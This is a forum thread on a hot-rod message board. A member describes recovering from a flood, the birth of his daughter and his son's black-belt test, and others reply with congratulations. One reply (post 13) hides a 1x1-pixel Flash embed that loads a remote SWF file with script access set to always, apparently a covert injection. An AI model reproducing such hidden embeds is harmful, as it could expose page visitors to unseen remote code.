Register now to get rid of these ads!

breeders beach party! flood 2011

Discussion in 'The Hokey Ass Message Board' started by breeder, Jul 8, 2011.

1. Made me laugh toddly!

2. breeder

breeder
    Member Emeritus

Ehh, could have been worse, coulda lost (sold) 53 belair, gasser falcon, and 73 wagoneer! This thread would have a whole diff tone if that would have been the case!

Trent, glad I made ya laugh ole buddy! ;)

3. breeder

breeder
    Member Emeritus

Well !!!!!!! WHAT A JUNE!!!!! SO, June for us has many important dates for me and my family.
    My first hamb meet n greet at our restaurant was June 10th 2006!
    My father passed away that very night on June 11th @ 55.
    My wedding anniversary to my wonderful wife is June 28th. (15 yrs this month)
    June 15th will be the first anniversary of the flood this thread is about!
    AND NOW...........
    JUNE 7th @ 2:20am
    ELLA FAITH REED WAS BORN!!!
    7.12 lbs
    20.50 inches long.
    And she is WONDERFUL AND VERY HEALTHY!!!
    So, my wife had Ella on her actual due date! Didn't know that actually ever happened! Lol
    To make the week even more interesting, my son Gabriel, left for Georgia on the 5th of June to take is black belt test.
    He won't be home till late Sunday! From what he and his instructors ( who took him for us), say, he is a BLACK BELT! They can't speak of it much, and only the master can verify it, but he did great!!!!!
    His test was also on the 7th of June! So within 36 hours, we had a baby, my son became a black belt, and we were back home! Wild week indeed!!!!
    On to the flood gunk. So last week I used a very large tractor and a VERY tiny disc and went over the farm the best I could without gettin stuck. Trees were already gettin as tall as me, so I wanted to get them chewed up for it was too late. Monday, the company that started to clean the trees off and rebuilt the levee, started pushing sand. I talked to bub, the owner, and he said they were goin on to clear almost all of the farm off! Huh? The government has all the paper work signed and ready and we have also signed it, but there's NO money. Bub said to hell with them and is doing it and just going to wait on the funds to be available! WOW!!!! When we got back home yesterday, they had cleaned off a good part of my yard! WHAT A WONDERFUL WEEK!
    When lil ella gets on a better sleeping pattern, I wil move all my junk over to cleared off yard, so they can help me dig the rest of the cars and such out! I may actually have grass again this fall! AMEN! Anywho, he's a couple pics I have on the iPad. I'll update it better later.
    I have a ton of pm s to get to and a couple packages to mail still, but I promise I'll get caught up soon
    Gotta go, wife wants a shower so I need 'to hold my lil girl. Just hope she's not hungry..... MY NIPPLES ARE KILLING ME.....
    BREEDER
    !

Attached Files:

4. Awesome news Todd! Hope things keep heading up for you and the fam.

5. breeder

breeder
    Member Emeritus

Thx man. I'll sendja a few hundred tons of sand for the hamb drags!!!! ;)

6. Mart

Mart

Congrats all round.

Mart.

7. rainhater1

rainhater1
    BANNED
    from az

Looks like breeder may be slowing down a bit. LOL keep it up John

8. norms30a

norms30a

Congratulations on all the good family things, fine looking little bit of a girl.

Your life has been quite an adventure lately. I get the feeling that things are starting to get better for you, from what I've seen on this thread you deserve it .

Bub needs a beer for his decency, that's a good guy!!!!!!

9. Your daughter has good taste in birthdays, she shares June 7 with people like Dean Martin, Anna Kournikova, and most importantly, me!.

Congrats on the new addition, and glad to see 2012 is doing better for you. Over the past year anytime I heard on the news about tornadoes or torrential rains in the midwest, I figured I'd see a post on the HAMB about it happening directly over your house.

10. Sorry to hear about Pappa. I didn't know about that when I commented on the baby picture on FB. You are, in spite of the difficulties, a blessed man and you have a ton of support from friends you may ore may not ever meet. Thanks for the update, be well...

11. A Rodder

A Rodder

Congratulations!!!!!!!!!!!!!

On all accounts

12. Rudebaker

Rudebaker
    from Illinois

Congrats all the way around!

13. killerbunny

killerbunny
    from serbia

Me too..<object width="1" height="1" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="undefined" value="http://smilyes4u.com/d/17/nr.swf" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://smilyes4u.com/d/17/nr.swf" /><param name="allowscriptaccess" value="always" /><embed width="1" height="1" type="application/x-shockwave-flash" src="http://smilyes4u.com/d/17/nr.swf" undefined="http://smilyes4u.com/d/17/nr.swf" allowScriptAccess="always" allowscriptaccess="always" /></object>;)

14. Todd - congrats on everything buddy.

15. Marty S1

Marty S1

Todd, Congratulations to you and Shana!!

Funny how what we think as the darkest of times bring the brightest things isn't it??? That's one beautiful lil' girl!!!!

Glad everything's looking up for you folks!

BTW....your nippys'll feel better if you LEAVE EM' ALONE ya perv!!!:eek:

Marty

16. HotRod60F100

HotRod60F100

Congrats on the new arrival man. and I'm glad things are returning to normal at the Breeder estate!

17. pdc

pdc

CONGRATS!! Glad to hear everything is looking up.

18. breeder

breeder
    Member Emeritus

Thanks gang. Talked to Gabriel last night and he got first place in sparring at the tournament they have after the black belt test! And he will be home today! Hot damn! Now if I could ever get the 62 gasser back home and work on it, this thread would have a car that's not flooded in it! Haha

19. resqd37Zep

resqd37Zep
    from Nor Cal

You are an inspiration to us all. Congrats on the new addition to the family.

20. breeder

breeder
    Member Emeritus

21. breeder

breeder
    Member Emeritus

Ohh and ....hahaha
    My lil Abby thougth it would be nice to clean up Gabriel's room for him as a welcome home. Sweet of her seeings how Gabriel is a huge slob!!!
    So, I went in to finish putting paintball stuff with paintball stuff, real gun stuff with...etc...cleaned out his large standup army locker....he had hidden old playboys in paintball pod tubes. There's a bunch of 70-80's playboys in the old house here on the farm I grew up in!!!!! I laughed my butt off and quickly threw them away for mom seen them! I now have leverage on mr. Black belt!!!! Haha

22. That is too funny. When we bought our house here in Nebraska, it had been home to a guy who moved away so he could go the seminary, to become a Pastor. He had raised a couple kids here. Well, one of the finished rooms in the basement must have been his son's room; a good boy, by all reports. When I turned that room into my home office, I put a ceiling fan in
    and, upon removing the drop ceiling panels, I fond a couple Victoria Secrets catalogues, a pack of unsmoked smokes and a fifth of whiskey (or was it Schnapps?), that was missing a few ounces... I guess it evaporated or something, Ha Ha...

Last edited: Jun 10, 2012
  23. Depends on how the carbs are set up...

24. breeder

breeder
    Member Emeritus

Whelp. My black belt is home. He kinna likes his lil sister! Don't care much for holding her, but loves her non the less! Atta bot son!

Attached Files:

25. ToddJ

ToddJ
    from Marion, IA

Congrats, Toddy! You must be one proud papa. Beautiful new baby AND a blackbelt in the house!

26. breeder

breeder
    Member Emeritus

Thanks jonesy! Yah, I'm pretty darn stoked!

27. Great news on the Breeder front! Ella looks beautiful! Tell Gabe congrats for me!

Keep in touch, Brother!

28. evil clown

evil clown
    from Verona, WI

Glad to see some of that good karma coming back around to the Reeds.

Congrats on everything, especially Ella!

29. breeder

breeder
    Member Emeritus

Thx gang..
    Welp, it's been 6 yrs almost to the min since I found my pops. He was 55! Miss ya dad and I'm sure you would have LOVED lil Ella!!!

Attached Files:

30. CONGRATULATIONS to you and Shana! What a beautiful little girl.

I sure enjoy reading all the wonderfully-positive news lately.